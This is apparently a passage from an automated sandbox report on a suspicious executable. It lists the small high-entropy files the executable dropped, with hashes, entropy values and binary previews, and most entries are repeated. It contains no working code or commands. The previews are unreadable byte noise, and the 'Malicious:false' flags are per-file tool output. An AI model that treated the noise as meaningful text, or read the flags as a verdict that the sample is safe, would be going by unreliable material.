.....g....}.!!B..9.Q..cvc..)r7t.&L..0U..'...wo....B..`.e.5..X.{5.#$s.7.).2..q.&.1..roct.5.#@.1.&x.!.............?{..Z..C_.N....KC7.....\..#...]...J".......B....*2.CG..q5........b...........6lm}...!..2;..&...^...\>.1.....(...b.qY^.V....`@.nt..l ss...U.......*..f.......!.-`
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.833704633687714
              Encrypted:false
              SSDEEP:24:0oQ21XBduZf5NUU1ip/HbTcGLoNGeJd03VwbewME5eAvMmrfQJwhf9+IUbD:k29XuZBNAp/HbIhNGd3Vwbew/jf9/+D
              MD5:35F021EB37B675A95C6ECD14B6109323
              SHA1:D57D303936688720FB126F29FBA4F8BC5F35FCA3
              SHA-256:0E341D7579C59738043BCBAB6A601A97C4AA545618F73BCB8763D93CB349BBD2
              SHA-512:3E0AEEBF5832A16573A7704561FECA880AEC5E49149208D9375FE892931D8EFA4654533BB85E4E1C6443AC7E4B6E188474D1F86E463368A08EED69EA4F4B8EDE
              Malicious:false
              Preview:NWCXB.d.!z.6#...!.^mB.....%...Q(2nO.wrn.i...y..pM...``UH...xCt..-.|K.....It2..h.MCy.m.Lru4U.../MBe...o...N..1+o$.._.....t.....z...j0)...........c..uU.}........6.<..y...<.%pS....O..'.3..ad.|..`.M'.,.)..o.i>....5.i.W./.{...X..}.A..}.l....\..C#*.....EAu...!.q..6.......dG%;.F'~.....G.....2.Hly.6Y!.....IiGe...l.n3.W.O.N..O../b.u.4..=9B?|z..d....t.&d.P..F...;.NLdS.......#.....l..~....u.7.....e.O/G.|j.{O."8....'.%tEc.FK`f.&B..O^P".......uu..v2Ds...X......,9....w.d..hg.....[.g.Z.....tI...IAl./=+lV..-..J..*."..+....D).I[2.4.}...8.a....x..s..{$..Ci)|..i.W....2x...b..|.G.....BI'....%.0!.=...|...M..9.~..N_.[z..v.di.#......n.1.I...T!#...UQh.....Z.H[..:..y'.o..5h...b...Y=5...........).+../3.....Q.oV.OCd...@.T.=......V;#Cf..p.......1.L%"....r...J..9aLc...;p..2..w.O..?.2].>U.\..)f6rx..a?...3a.2H.Fa.&o.yH..,...P;..x.....V..../(.F$+.......\^.b.x6{.?%Z.k...{..GH...4*pT.R..>....j.m.Yh.hBG..[9.)..O....^.I.w...S.<.{..B=%..4.ec._..#.F..qt.Y.]x...:..Lu.....r.O.....T
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.833704633687714
              Encrypted:false
              SSDEEP:24:0oQ21XBduZf5NUU1ip/HbTcGLoNGeJd03VwbewME5eAvMmrfQJwhf9+IUbD:k29XuZBNAp/HbIhNGd3Vwbew/jf9/+D
              MD5:35F021EB37B675A95C6ECD14B6109323
              SHA1:D57D303936688720FB126F29FBA4F8BC5F35FCA3
              SHA-256:0E341D7579C59738043BCBAB6A601A97C4AA545618F73BCB8763D93CB349BBD2
              SHA-512:3E0AEEBF5832A16573A7704561FECA880AEC5E49149208D9375FE892931D8EFA4654533BB85E4E1C6443AC7E4B6E188474D1F86E463368A08EED69EA4F4B8EDE
              Malicious:false
              Preview:NWCXB.d.!z.6#...!.^mB.....%...Q(2nO.wrn.i...y..pM...``UH...xCt..-.|K.....It2..h.MCy.m.Lru4U.../MBe...o...N..1+o$.._.....t.....z...j0)...........c..uU.}........6.<..y...<.%pS....O..'.3..ad.|..`.M'.,.)..o.i>....5.i.W./.{...X..}.A..}.l....\..C#*.....EAu...!.q..6.......dG%;.F'~.....G.....2.Hly.6Y!.....IiGe...l.n3.W.O.N..O../b.u.4..=9B?|z..d....t.&d.P..F...;.NLdS.......#.....l..~....u.7.....e.O/G.|j.{O."8....'.%tEc.FK`f.&B..O^P".......uu..v2Ds...X......,9....w.d..hg.....[.g.Z.....tI...IAl./=+lV..-..J..*."..+....D).I[2.4.}...8.a....x..s..{$..Ci)|..i.W....2x...b..|.G.....BI'....%.0!.=...|...M..9.~..N_.[z..v.di.#......n.1.I...T!#...UQh.....Z.H[..:..y'.o..5h...b...Y=5...........).+../3.....Q.oV.OCd...@.T.=......V;#Cf..p.......1.L%"....r...J..9aLc...;p..2..w.O..?.2].>U.\..)f6rx..a?...3a.2H.Fa.&o.yH..,...P;..x.....V..../(.F$+.......\^.b.x6{.?%Z.k...{..GH...4*pT.R..>....j.m.Yh.hBG..[9.)..O....^.I.w...S.<.{..B=%..4.ec._..#.F..qt.Y.]x...:..Lu.....r.O.....T
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.845318228357784
              Encrypted:false
              SSDEEP:24:P+vScmoBlhaZFnQd8fQ4bV+PhxtnZ3NmhaYe6bNlBmP+dl11d11jsVWYB2sBij5I:UdlhaZ5ECQ4bV+J/JNmhM6bxLf3LNSBR
              MD5:0950D61A61226DB2602F581AAB3271BC
              SHA1:CE8FD3867FD936371353C6CD5BF9A8940A056174
              SHA-256:E707DE3B9BB2126ABB5052A1AEF4E50CF44BC23062C577F116FE152D35F4E915
              SHA-512:5097774108FBDDEA023F51650C1444949554B8F3C42E4F89970BEC426DB668D72356076C2DC1DCEA73CF9E3A5734F5A585973299354FC0376CE010F68A0CADD2
              Malicious:false
              Preview:QFAPO9.V.^.............R....U...../.h...q..r.y.3..}$.V....I<u.......|..{.`.Ho..n.......W....;...?~.[..O.1W.E....{{./..8....c..../...gp@..f}.U..P.^.o%H.n.....x.`..R\!..5.+\...N.!^..i.... ...P....u=f.7W......X.....H........X...g.NZr|..:. D.Hq.R2.Q....b..:...S..?.`.k35.._.8<3I.h.kc.....0...J.n.3..O.V.. D=.q....Si.$o.l...U..t.....P......6F.z.;3.c..T.K..T+P...zB8.~X....$..:..Gt.*...w...G.......M.DR...s.[.?....G.c..%..k..*.:.\....<.TI.7..G.X....?.T .O....8-.j_.P.......g.S.nC...f]mX...M.....4...:y.n..#.....d......A]....9.>.j.Z.x2.\K.5......oZ....3Q.6.....)d..v./.3..SrR?.(./.......2..,.x.F...+s.5.mG9...............(k.g.~.e..%Qd..`.... ....W.x.....U.r..k.2.f.l6;..I....!\5..cR.oP...k....z....)..g..szR..23h]T0lC_.p......;.wF.W*................f!.H8.}...s.T.._.#..+}l?....o5D...<.O.9.:......[[........6._\h..7..|7o. 7^p...Q.pN..(.K..~...g>... ....6..x........c....O....y7[....s...<...R......{c0......W.U....r'}.F=.B......}{I...b..Nd[.@.T
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.845318228357784
              Encrypted:false
              SSDEEP:24:P+vScmoBlhaZFnQd8fQ4bV+PhxtnZ3NmhaYe6bNlBmP+dl11d11jsVWYB2sBij5I:UdlhaZ5ECQ4bV+J/JNmhM6bxLf3LNSBR
              MD5:0950D61A61226DB2602F581AAB3271BC
              SHA1:CE8FD3867FD936371353C6CD5BF9A8940A056174
              SHA-256:E707DE3B9BB2126ABB5052A1AEF4E50CF44BC23062C577F116FE152D35F4E915
              SHA-512:5097774108FBDDEA023F51650C1444949554B8F3C42E4F89970BEC426DB668D72356076C2DC1DCEA73CF9E3A5734F5A585973299354FC0376CE010F68A0CADD2
              Malicious:false
              Preview:QFAPO9.V.^.............R....U...../.h...q..r.y.3..}$.V....I<u.......|..{.`.Ho..n.......W....;...?~.[..O.1W.E....{{./..8....c..../...gp@..f}.U..P.^.o%H.n.....x.`..R\!..5.+\...N.!^..i.... ...P....u=f.7W......X.....H........X...g.NZr|..:. D.Hq.R2.Q....b..:...S..?.`.k35.._.8<3I.h.kc.....0...J.n.3..O.V.. D=.q....Si.$o.l...U..t.....P......6F.z.;3.c..T.K..T+P...zB8.~X....$..:..Gt.*...w...G.......M.DR...s.[.?....G.c..%..k..*.:.\....<.TI.7..G.X....?.T .O....8-.j_.P.......g.S.nC...f]mX...M.....4...:y.n..#.....d......A]....9.>.j.Z.x2.\K.5......oZ....3Q.6.....)d..v./.3..SrR?.(./.......2..,.x.F...+s.5.mG9...............(k.g.~.e..%Qd..`.... ....W.x.....U.r..k.2.f.l6;..I....!\5..cR.oP...k....z....)..g..szR..23h]T0lC_.p......;.wF.W*................f!.H8.}...s.T.._.#..+}l?....o5D...<.O.9.:......[[........6._\h..7..|7o. 7^p...Q.pN..(.K..~...g>... ....6..x........c....O....y7[....s...<...R......{c0......W.U....r'}.F=.B......}{I...b..Nd[.@.T
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.849484386156521
              Encrypted:false
              SSDEEP:24:B98CC11GIkw8IYq1WiN5rZhCNJdktikkFvGgjOeQRtqy1mmrEEsTIRSwIbD:B97c1GA8I1j5reatiksvVORv1LEFWSw6
              MD5:BF934BE6DF01B91B069CC82E59A4A4D7
              SHA1:F02F8D198C7B93BEC12E3B29B9BDD63956DBB79A
              SHA-256:24F88BB6E8A24020318A0DF0947EBF326A8518B30135E58553B911186586733A
              SHA-512:3F3B57928C0941E14BD760E03DB34856CB90670E8BA3A3762BFF1A846BB9D929A641A275C9726EBA2616CC400B1DF510BEDCAB87512982E677690769C2B38EEE
              Malicious:false
              Preview:VWDFP<'.u.&.RJ..i.#.%.m..D.c....^.s.~D!P ....k..=.w..8.../..A...N1.$. ..".4..7.....d._C.Fe.k..T.B.R@7[7J.Q..(H....t....wb.&.f[...f.d....G...W...u..h...H1.A.r.3............o..w.6iw.wZ...Y-`..D-.~..%.....q.4.P).uc..v..o.. ...h..R.*...V........t.).."&... j....i%..@..yR_{.z.^.K........L..R..F.._....K..?.z.2...y..U.....S~..U..N;d.....r.....q&2:...].x47g..x3...}....5.J$.W.Pul.W...*.A8.x(..#i..n..na.P...av......R.g...F.f._.{K..[..6.g...a..........Z..y7y.]..O.s.h..x..L.....E..%...Z.EB....h...1.ls.?AX2P...-lGv.%....Uv...-.#....h...'X.M.....f.A34.`z...QF1.C.j..;8..`.t..o..D...g#O.P>.K..:..>...s.:...L..WU-.>...y.QEs.hG.[.m..sR.;.L..o.'...$.64..?C.N1.f............k.u.A.**...4.7....]..B..*H&.;0.Uld.=.;....#.w..G.2gb...J..`.[..z.?......BF.O........;.$M..B...N..3.}$.;f.IA.....PQ.D.C...L.U.....uk<ds..$..>..\.3Z..:#GX..R....]g..A$.1dYM...,[S.....A.....,.'....d6...h...T.M.\Z.`}..@..C>Ab^,...H......+......!.....^5Z.jg?.0<'`.G..;O.....y`.C..t.1.-.{.....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.849484386156521
              Encrypted:false
              SSDEEP:24:B98CC11GIkw8IYq1WiN5rZhCNJdktikkFvGgjOeQRtqy1mmrEEsTIRSwIbD:B97c1GA8I1j5reatiksvVORv1LEFWSw6
              MD5:BF934BE6DF01B91B069CC82E59A4A4D7
              SHA1:F02F8D198C7B93BEC12E3B29B9BDD63956DBB79A
              SHA-256:24F88BB6E8A24020318A0DF0947EBF326A8518B30135E58553B911186586733A
              SHA-512:3F3B57928C0941E14BD760E03DB34856CB90670E8BA3A3762BFF1A846BB9D929A641A275C9726EBA2616CC400B1DF510BEDCAB87512982E677690769C2B38EEE
              Malicious:false
              Preview:VWDFP<'.u.&.RJ..i.#.%.m..D.c....^.s.~D!P ....k..=.w..8.../..A...N1.$. ..".4..7.....d._C.Fe.k..T.B.R@7[7J.Q..(H....t....wb.&.f[...f.d....G...W...u..h...H1.A.r.3............o..w.6iw.wZ...Y-`..D-.~..%.....q.4.P).uc..v..o.. ...h..R.*...V........t.).."&... j....i%..@..yR_{.z.^.K........L..R..F.._....K..?.z.2...y..U.....S~..U..N;d.....r.....q&2:...].x47g..x3...}....5.J$.W.Pul.W...*.A8.x(..#i..n..na.P...av......R.g...F.f._.{K..[..6.g...a..........Z..y7y.]..O.s.h..x..L.....E..%...Z.EB....h...1.ls.?AX2P...-lGv.%....Uv...-.#....h...'X.M.....f.A34.`z...QF1.C.j..;8..`.t..o..D...g#O.P>.K..:..>...s.:...L..WU-.>...y.QEs.hG.[.m..sR.;.L..o.'...$.64..?C.N1.f............k.u.A.**...4.7....]..B..*H&.;0.Uld.=.;....#.w..G.2gb...J..`.[..z.?......BF.O........;.$M..B...N..3.}$.;f.IA.....PQ.D.C...L.U.....uk<ds..$..>..\.3Z..:#GX..R....]g..A$.1dYM...,[S.....A.....,.'....d6...h...T.M.\Z.`}..@..C>Ab^,...H......+......!.....^5Z.jg?.0<'`.G..;O.....y`.C..t.1.-.{.....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.8476913072463335
              Encrypted:false
              SSDEEP:24:vXVDQfHSCRsMjieychXJZ6EtvQn/UVkPLv+XxzR1cZtdh7mM7skbD:vXFQPSa/ieycJjRtvQ/Ckjv+pctp7suD
              MD5:6E7D11695552DA28864D722787194847
              SHA1:CED46DDFC2256D948691DC30A1FC4C8064A9094B
              SHA-256:DA40C184554FD932CF50F9574A78056D28E505C9749A0E3D706D0545EEAF5CBF
              SHA-512:E31D515F019097A69179BA90C64D9858B05C8CE764FA4772755FCE289F230B2108F1DE583A3C66C1C5DBADEF557503805FC3E01802F770BD9614E2592B261F3F
              Malicious:false
              Preview:QFAPO.N.z&i....[.by....=..7..].x....'..5.'.M..l.De..s..k...<.....P...=..... .L.h..{.%[..a}..F%.Z.([.&..MF.g........4.x.B...?..~....u..I.:...../:j.u5L.8q....4.mN.{4..fD.w..../^'.3}..b.g/..FMK.s...u...\Xg.k.%6O.....^.6sYJ.b.'@..g....7.......i..J...B M..C..g......@....!..iU!..:..6 k..|..?..4.H....YP6....S..j....!8a.=7.1.K!.$.t......U.A@..n:C...d.}.Uv.[...N|.o.U.;.dd..H-1C......K0.........S. f{D.0}.%....rk....%.....i....k.J..ANk..\...:(.d..!y'g.b.Q.J.~2...:u.R.!H..+.2.u......`c...,..d^..:.DP....`.6......iV..JQ.!...Q..y../.=j'._-.kI..{.H9=-...F...e..7......d..U...5.%....5{I.$..&.'..B..a...3-d..{.!B.......]..........y?.".X.[A.w.$nw.]...Z....DbT.).z....C.<.....S&.. ..w.`...Nq....e.V.6.X...hs...{}....`.......c..*..>.O,..l.....tin...m$...;......|.=S.!h......b..m`..c?v.U.d.'._.q.f..".|@..w.c_.C.CKK....hq.J*.!...........oF..-..Nf.'/....:..kD..M(\.............g.`~..'(..M. !..n...Zhj2.{y..`.T,r/F.1.........kH...].7..3....0..ru.4. N...Yv`.n.H.....i..F."L
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.8476913072463335
              Encrypted:false
              SSDEEP:24:vXVDQfHSCRsMjieychXJZ6EtvQn/UVkPLv+XxzR1cZtdh7mM7skbD:vXFQPSa/ieycJjRtvQ/Ckjv+pctp7suD
              MD5:6E7D11695552DA28864D722787194847
              SHA1:CED46DDFC2256D948691DC30A1FC4C8064A9094B
              SHA-256:DA40C184554FD932CF50F9574A78056D28E505C9749A0E3D706D0545EEAF5CBF
              SHA-512:E31D515F019097A69179BA90C64D9858B05C8CE764FA4772755FCE289F230B2108F1DE583A3C66C1C5DBADEF557503805FC3E01802F770BD9614E2592B261F3F
              Malicious:false
              Preview:QFAPO.N.z&i....[.by....=..7..].x....'..5.'.M..l.De..s..k...<.....P...=..... .L.h..{.%[..a}..F%.Z.([.&..MF.g........4.x.B...?..~....u..I.:...../:j.u5L.8q....4.mN.{4..fD.w..../^'.3}..b.g/..FMK.s...u...\Xg.k.%6O.....^.6sYJ.b.'@..g....7.......i..J...B M..C..g......@....!..iU!..:..6 k..|..?..4.H....YP6....S..j....!8a.=7.1.K!.$.t......U.A@..n:C...d.}.Uv.[...N|.o.U.;.dd..H-1C......K0.........S. f{D.0}.%....rk....%.....i....k.J..ANk..\...:(.d..!y'g.b.Q.J.~2...:u.R.!H..+.2.u......`c...,..d^..:.DP....`.6......iV..JQ.!...Q..y../.=j'._-.kI..{.H9=-...F...e..7......d..U...5.%....5{I.$..&.'..B..a...3-d..{.!B.......]..........y?.".X.[A.w.$nw.]...Z....DbT.).z....C.<.....S&.. ..w.`...Nq....e.V.6.X...hs...{}....`.......c..*..>.O,..l.....tin...m$...;......|.=S.!h......b..m`..c?v.U.d.'._.q.f..".|@..w.c_.C.CKK....hq.J*.!...........oF..-..Nf.'/....:..kD..M(\.............g.`~..'(..M. !..n...Zhj2.{y..`.T,r/F.1.........kH...].7..3....0..ru.4. N...Yv`.n.H.....i..F."L
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.864551627448617
              Encrypted:false
              SSDEEP:24:Cmxx0ln5fBSOJ1tHGopd8Lw4mwuHCaYp24tZuqejqm99dXZbD:Cmun5fpJbmopd34AHN86qm9vZD
              MD5:BE96BE467793A6D21F3C5BC56C146732
              SHA1:CA4F7D3511C6F2C01578DD2918A4E64A4C43E71A
              SHA-256:8EF75B3360759DAFE65645CD2A8F1A7F72CEDB1A06D099057A88B0809B27E48C
              SHA-512:7FA4D24090E462FCB2F631E5F5A20A97653F4A91849F780BC943AA8A3483E577D8318FC36DEDE6AF5B91722E123AC177ADCB3A311420E5BDF807388FE853C732
              Malicious:false
              Preview:UNKRL.DI ..QL.0..C.'z.....D6*?Q......2..K.g3....ZI6p..T>7.ph.j3{f...uL.?J'...$..*."..[.`.@]...!.t)..8..a..o......L.;.u.n...!...]...J.x.).......2..!.s|.B.{{...IA..[....N.U... ..B....(=D.._.o$@.n ...B)G.......B.O..0...jMw.hm..d..6nD@~.. }#..4.~..+..k\.....A.....;.....>...g.Ph.%.2@.{}..0O...H..&Upq.^..5.j......t.2.3..[.bY...........y...2.r..h.fMCV.#8.r.../.X.ncfi.>/'.....Y.b...i.$....Q....5....$.0...6........*"..\...^^.n...).P.L/..E.....g'......wL....lL..(%...Z?....R...8..'..3..,_.V..NC~P.X.<.X..h-.........6]..x.......#Jd.m:..j..v3..&..L.HTj..q.=tKC..{._.....x'.\.).oB.q..3.rf.fmS.qM.....$.Oh.(.....)R>k.:...&..S.x.....U...!.7.#.s=....l3..{....;.<...X.~38_0.._.$......S..e.....&.......l.....!.BL... ......!d...ns...l...Q.F.w..DsE...P.hA..1x..Z..=K.'W...e....B.......+W.:|...K,..6.L).ooB3..7...Cf...r..Y....[R$o-l.3.{rD....w.z.5.......p..G.=z...........c.l$..,...G.X......1..9.......]:BS.v.l.....7..-.t...gk..0..x..Rc....8.wD........0.....Z..E..V.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.864551627448617
              Encrypted:false
              SSDEEP:24:Cmxx0ln5fBSOJ1tHGopd8Lw4mwuHCaYp24tZuqejqm99dXZbD:Cmun5fpJbmopd34AHN86qm9vZD
              MD5:BE96BE467793A6D21F3C5BC56C146732
              SHA1:CA4F7D3511C6F2C01578DD2918A4E64A4C43E71A
              SHA-256:8EF75B3360759DAFE65645CD2A8F1A7F72CEDB1A06D099057A88B0809B27E48C
              SHA-512:7FA4D24090E462FCB2F631E5F5A20A97653F4A91849F780BC943AA8A3483E577D8318FC36DEDE6AF5B91722E123AC177ADCB3A311420E5BDF807388FE853C732
              Malicious:false
              Preview:UNKRL.DI ..QL.0..C.'z.....D6*?Q......2..K.g3....ZI6p..T>7.ph.j3{f...uL.?J'...$..*."..[.`.@]...!.t)..8..a..o......L.;.u.n...!...]...J.x.).......2..!.s|.B.{{...IA..[....N.U... ..B....(=D.._.o$@.n ...B)G.......B.O..0...jMw.hm..d..6nD@~.. }#..4.~..+..k\.....A.....;.....>...g.Ph.%.2@.{}..0O...H..&Upq.^..5.j......t.2.3..[.bY...........y...2.r..h.fMCV.#8.r.../.X.ncfi.>/'.....Y.b...i.$....Q....5....$.0...6........*"..\...^^.n...).P.L/..E.....g'......wL....lL..(%...Z?....R...8..'..3..,_.V..NC~P.X.<.X..h-.........6]..x.......#Jd.m:..j..v3..&..L.HTj..q.=tKC..{._.....x'.\.).oB.q..3.rf.fmS.qM.....$.Oh.(.....)R>k.:...&..S.x.....U...!.7.#.s=....l3..{....;.<...X.~38_0.._.$......S..e.....&.......l.....!.BL... ......!d...ns...l...Q.F.w..DsE...P.hA..1x..Z..=K.'W...e....B.......+W.:|...K,..6.L).ooB3..7...Cf...r..Y....[R$o-l.3.{rD....w.z.5.......p..G.=z...........c.l$..,...G.X......1..9.......]:BS.v.l.....7..-.t...gk..0..x..Rc....8.wD........0.....Z..E..V.
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.848776440507086
              Encrypted:false
              SSDEEP:24:8R7rm/PwXAAWEkzqYoC1p0SSHW0P1hsPa60odFkvHi2P22gulEEhVdfh78LdsPoT:8R7y/PwwAZghS2MyaBoTk/iagEtSGqD
              MD5:DB311559B8B3A869A2F923006E06AA7F
              SHA1:F4F0CE7D2180928DBDACF8EC19E7620693071BC3
              SHA-256:07587D35D2528E7BC39261065AFE4913C84F70C0269F69AB471C3CA5CC54FF4F
              SHA-512:DE59361310656D7585DED4D63368BD0ED9BED8FDD491F9BCC3CE6F396378CCADB9929D13963D6B056450FA7745D192CA5B9A5791BAF757CE0C46108113F9C31C
              Malicious:false
              Preview:VWDFP?.f.4n....U......w=..!.....).,y4..Ff...n..j.......s....a.S..I..C..f........XC......t..gY..c`.....(..Ka...J<.;Z#...F..~.6.fda.....b..9.F.....S.c..Ra.L...3.'cp.%.U.zi.=a.>....H.E2..N......L...[<M...!h...D. .5)oW~#.K....`.P^K0....A......nW.{5....J.......|TrL.5.**..=.rw#.._..G...J..S.TB.P.w..uKs.....Ho"."..........w....n.\....`...u'...%z.F.T..".g...=.".s..r.H.G.F<..8..N@\.M..l.=SFR.C6jI.hV..c......-.,.>&.1..S..%..<....6..,...:}...s.....a=W.Ez..h.x.+.;k1.,.h\X...M.N!.gY....{......5;..n.....\p.AEu.IH..]a.r.......L..Z...t....s..2R..EbmDe./T.o...."..gt8S.h-.&w.t.?`H.@.X..d..i....`.r.f3.8.h..U.. G..f{^....+ei[.[#.r....znf..K.Y.F......]0.....5@.....i-..P/...m.....H.|.:R@.....,P.k...?..Ra......S..j@w...?........m,D..P7-R..D..QPTH|b..../.....D.1...U.2N.....d{p....YT(.(:T.............L.f............JqN.@...mw....8.(]h.V...qz....V0.....-..3-S=xv...GS.IY..6H.7..4.!..VZ...$...~&.~..K_..nU..>..eU....Cr...x..#v.pt..U"...7.uX.i.-0....Q.IM9..X... .`...N...
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.848776440507086
              Encrypted:false
              SSDEEP:24:8R7rm/PwXAAWEkzqYoC1p0SSHW0P1hsPa60odFkvHi2P22gulEEhVdfh78LdsPoT:8R7y/PwwAZghS2MyaBoTk/iagEtSGqD
              MD5:DB311559B8B3A869A2F923006E06AA7F
              SHA1:F4F0CE7D2180928DBDACF8EC19E7620693071BC3
              SHA-256:07587D35D2528E7BC39261065AFE4913C84F70C0269F69AB471C3CA5CC54FF4F
              SHA-512:DE59361310656D7585DED4D63368BD0ED9BED8FDD491F9BCC3CE6F396378CCADB9929D13963D6B056450FA7745D192CA5B9A5791BAF757CE0C46108113F9C31C
              Malicious:false
              Preview:VWDFP?.f.4n....U......w=..!.....).,y4..Ff...n..j.......s....a.S..I..C..f........XC......t..gY..c`.....(..Ka...J<.;Z#...F..~.6.fda.....b..9.F.....S.c..Ra.L...3.'cp.%.U.zi.=a.>....H.E2..N......L...[<M...!h...D. .5)oW~#.K....`.P^K0....A......nW.{5....J.......|TrL.5.**..=.rw#.._..G...J..S.TB.P.w..uKs.....Ho"."..........w....n.\....`...u'...%z.F.T..".g...=.".s..r.H.G.F<..8..N@\.M..l.=SFR.C6jI.hV..c......-.,.>&.1..S..%..<....6..,...:}...s.....a=W.Ez..h.x.+.;k1.,.h\X...M.N!.gY....{......5;..n.....\p.AEu.IH..]a.r.......L..Z...t....s..2R..EbmDe./T.o...."..gt8S.h-.&w.t.?`H.@.X..d..i....`.r.f3.8.h..U.. G..f{^....+ei[.[#.r....znf..K.Y.F......]0.....5@.....i-..P/...m.....H.|.:R@.....,P.k...?..Ra......S..j@w...?........m,D..P7-R..D..QPTH|b..../.....D.1...U.2N.....d{p....YT(.(:T.............L.f............JqN.@...mw....8.(]h.V...qz....V0.....-..3-S=xv...GS.IY..6H.7..4.!..VZ...$...~&.~..K_..nU..>..eU....Cr...x..#v.pt..U"...7.uX.i.-0....Q.IM9..X... .`...N...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.84982813048973
              Encrypted:false
              SSDEEP:24:LY3MROx3gBhQRMQlnC5NDZzZgHvTXZN9qUndBz286zyoFEl4iP5DdYwbIUbD:0tx3gDQRMQcbSflirrQHjYED
              MD5:34DCE34268CC57C758F6B323CE113BC3
              SHA1:352866ED28193211EB55A6DBDC60951CAC4B319B
              SHA-256:35864541CA47377E82680638D909561FD1A875918B07CC29721E7825F549FB58
              SHA-512:7906BD916299008905B771C6BFF31F17CAEAB46873B1C074C6DB732F77C9FBE6BA7291F2F911ECDDF3B834A7E4841A50C8C9156A895484E00E2FCD5F6D787CAE
              Malicious:false
              Preview:ZIPXYI,..X.,!.cv....e..P..9.......~R...6J&.b..|....l^.V.]5..[$.|.4..d. ...d.h.q(<Au...E...~.M...rN.+&.. ..Q.c...o.^...~..<..S..R.S.(b.2.......d.1H.\.>..3....Yy....; v.)..I.0.^....Yb.$XCE...Z.P...')T7\u..MT#E.__h..W.y..U....0"'J._....X.%.f.au...\.......a...<*N,.P.^_.o....B %7....?..Y..........ENF..MaSS.S.H....k...#Y.w3.|..4\bz....Z.~....pQ.....>..;'6......2H+...+..m$m...........B..J......7...wB...W..^.<.M..&/P..L..vO9M.h.D.5...=z%..etU....X....'..~.]..=_"\.....MTV.V5....W../.w.r.vr.*...|5J.....Y....6h...7.m:..N...^..L:.f....06P4:.....9.V*........3BOM..Q{...:`4w\...._....yw...y.&...r2{.....P.|clu...7'W...h. ...*..m?BS1*+` ..oy../.gW.R`.....v...t4E.... ...x..64.`<AQ..bB...6.e.S}_..3G.b.k.PN.c.....ljz...s...@$..q..N.A.}1...\N.....xk..=1^..%".l...;n..b......(&.|.T.r5...9mw..YB.m..>M*.......E.0y..[.P.3j.....^......jX ..(..h.0...#=....I.%...x.D..`H.\..W.j.......$C..R..A_.%oN..Y.V.*...Nf.-.X.....'D.....uS..m@..u...J..L....@}8...........?...5.iH'..A.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.84982813048973
              Encrypted:false
              SSDEEP:24:LY3MROx3gBhQRMQlnC5NDZzZgHvTXZN9qUndBz286zyoFEl4iP5DdYwbIUbD:0tx3gDQRMQcbSflirrQHjYED
              MD5:34DCE34268CC57C758F6B323CE113BC3
              SHA1:352866ED28193211EB55A6DBDC60951CAC4B319B
              SHA-256:35864541CA47377E82680638D909561FD1A875918B07CC29721E7825F549FB58
              SHA-512:7906BD916299008905B771C6BFF31F17CAEAB46873B1C074C6DB732F77C9FBE6BA7291F2F911ECDDF3B834A7E4841A50C8C9156A895484E00E2FCD5F6D787CAE
              Malicious:false
              Preview:ZIPXYI,..X.,!.cv....e..P..9.......~R...6J&.b..|....l^.V.]5..[$.|.4..d. ...d.h.q(<Au...E...~.M...rN.+&.. ..Q.c...o.^...~..<..S..R.S.(b.2.......d.1H.\.>..3....Yy....; v.)..I.0.^....Yb.$XCE...Z.P...')T7\u..MT#E.__h..W.y..U....0"'J._....X.%.f.au...\.......a...<*N,.P.^_.o....B %7....?..Y..........ENF..MaSS.S.H....k...#Y.w3.|..4\bz....Z.~....pQ.....>..;'6......2H+...+..m$m...........B..J......7...wB...W..^.<.M..&/P..L..vO9M.h.D.5...=z%..etU....X....'..~.]..=_"\.....MTV.V5....W../.w.r.vr.*...|5J.....Y....6h...7.m:..N...^..L:.f....06P4:.....9.V*........3BOM..Q{...:`4w\...._....yw...y.&...r2{.....P.|clu...7'W...h. ...*..m?BS1*+` ..oy../.gW.R`.....v...t4E.... ...x..64.`<AQ..bB...6.e.S}_..3G.b.k.PN.c.....ljz...s...@$..q..N.A.}1...\N.....xk..=1^..%".l...;n..b......(&.|.T.r5...9mw..YB.m..>M*.......E.0y..[.P.3j.....^......jX ..(..h.0...#=....I.%...x.D..`H.\..W.j.......$C..R..A_.%oN..Y.V.*...Nf.-.X.....'D.....uS..m@..u...J..L....@}8...........?...5.iH'..A.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.819288790545225
              Encrypted:false
              SSDEEP:24:n52zdsfDL+saQIvpkvO60i5Jkb5k2taI327NejSAjoAQBz60IuwwOJbD:gUTFIxkm5BVk2JQNejSuo9Iuw9D
              MD5:B3ED71DEB9B5A94782491EADE8C24070
